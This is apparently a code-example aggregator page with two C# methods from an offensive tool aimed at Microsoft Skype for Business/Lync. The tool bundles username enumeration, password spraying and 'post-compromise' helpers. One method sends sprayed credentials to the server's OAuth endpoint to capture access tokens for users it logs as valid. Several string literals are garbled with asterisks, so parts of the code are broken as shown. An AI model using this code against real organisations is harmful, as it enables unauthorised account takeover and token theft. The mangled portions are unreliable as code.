Exemplo n.º 1
0
 public static ServiceInterface getOrCreateServiceInterface(List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
 {
     if (serviceInterfaces.Any(u => u.service == MicrosoftService.Skype))
     {
         UI.ThreadSafeAppendLog("[3]Selecting existing Skype interface...");
         IEnumerable <ServiceInterface> allSkype = serviceInterfaces.Where(x => x.service == MicrosoftService.Skype);
         foreach (ServiceInterface serv in allSkype)
         {
             if (serv.host.RealLync == true)
             {
                 serv.postCompromise.RealAddress = serv.host.Hostname;
                 return(serv);
             }
         }
     }
     else
     {
         //Don't already have service interface for skype - so create if we can
         if (enumeratedHostnames.Any(x => x.Service == MicrosoftService.Skype && x.RealLync == true))
         {
             Hostnames enumeratorHostname = (enumeratedHostnames.Where(x => x.Service == MicrosoftService.Skype && x.RealLync == true)).First();
             UI.ThreadSafeAppendLog("[3]Adding new enumerator with service: " + MicrosoftService.Skype);
             ServiceInterface serviceInterface = new ServiceInterface()
             {
                 host = enumeratorHostname, service = MicrosoftService.Skype, UI = UI, enumerator = new UsernameEnumeration(), sprayer = new PasswordSpray(), postCompromise = new PostCompromise()
                 {
                     RealAddress = enumeratorHostname.Hostname, UI = UI
                 }
             };
             serviceInterfaces.Add(serviceInterface);
             return(serviceInterface);
         }
         else
         {
             //error message comes from what calls this
             return(null);
         }
     }
     return(null);
 }
Exemplo n.º 2
0
        public static Boolean PreEmptOAuthPostExploit(CredentialsRecord record, List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
        {
            if (record.Token != "" && record.Token != null)
            {
                return(true);
            }
            else
            {
                ServiceInterface serviceInterface = getOrCreateServiceInterface(serviceInterfaces, UI, enumeratedHostnames);
                if (serviceInterface != null)
                {
                    //So basically - we need to auth to the REAL SKYPE interface AUTH ENDPOINT - IF it is oauth - and get the token - add it to this record and change the record's service to Skype
                    //THIS IS THEN ONE ALREADY SET UP - REAL LYNC ETC - SO JUST GO - WITH NEW USERNAME LIST


                    //Check it is not an NTLM endpoint or such for Skype
                    if (serviceInterface.host.SprayURL.Url != "" && serviceInterface.host.SprayURL.Url != null)
                    {
                        if (serviceInterface.host.SprayURL.Url.Contains("oauthtoken"))
                        {
                            //This CAN BE either legacy or modern format - so just go with what we have as known valid
                            //Only causes issue with legacy here if user is invalid = v slow
                            string domainUser = record.Username;
                            UI.ThreadSafeAppendLog("[4]Record username in required format: " + domainUser);

                            string postData = "grant_type=password&username="******"&password="******"application/x-www-form-urlencoded";
                            request.UserAgent   = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0";
                            request.Method      = "POST";
                            var data = Encoding.ASCII.GetBytes(postData);
                            request.ContentLength = data.Length;

                            try
                            {
                                using (var stream = request.GetRequestStream())
                                {
                                    stream.Write(data, 0, data.Length);
                                }
                                var response       = (HttpWebResponse)request.GetResponse();
                                var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
                                response.Close();
                                UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);

                                if (responseString.Contains("access_token"))
                                {
                                    //Add access token to existing record

                                    Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
                                    if (accessTokenMatch.Success)
                                    {
                                        string accessToken = accessTokenMatch.Value;
                                        record.Token   = accessToken;
                                        record.Service = MicrosoftService.Skype;
                                        UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
                                        return(false);
                                    }
                                }
                            }
                            catch (WebException webException3)
                            {
                                HttpWebResponse response = webException3.Response as HttpWebResponse;
                                try
                                {
                                    var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
                                    UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
                                    if (responseString.Contains("access_token"))
                                    {
                                        Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
                                        if (accessTokenMatch.Success)
                                        {
                                            string accessToken = accessTokenMatch.Value;
                                            record.Token   = accessToken;
                                            record.Service = MicrosoftService.Skype;
                                            UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
                                            return(false);
                                        }
                                    }
                                    else if (responseString.Contains("Bad Request"))
                                    {
                                        UI.ThreadSafeAppendLog("[1]Valid credentials found - User not SIP enabled or similar: " + record.Username);
                                        return(false);
                                    }
                                }
                                catch (Exception esdf)
                                {
                                    UI.ThreadSafeAppendLog("[1]Exception: " + esdf.ToString());
                                    return(false);
                                }
                            }
                            catch (Exception ex)
                            {
                                UI.ThreadSafeAppendLog("[1]Exception: " + ex.ToString());
                                return(false);
                            }
                        }
                        else
                        {
                            UI.ThreadSafeAppendLog("[1]Oauth URL not found for Skype host - perhaps the password spray URL is NTLM authentication or other...");
                            return(false);
                        }
                    }
                    else
                    {
                        UI.ThreadSafeAppendLog("[1]No valid authentication URL...");
                        return(false);
                    }
                }
                else
                {
                    UI.ThreadSafeAppendLog("[1]No valid Skype host for authenticaton...");
                    return(false);
                }
            }
            return(false);
        }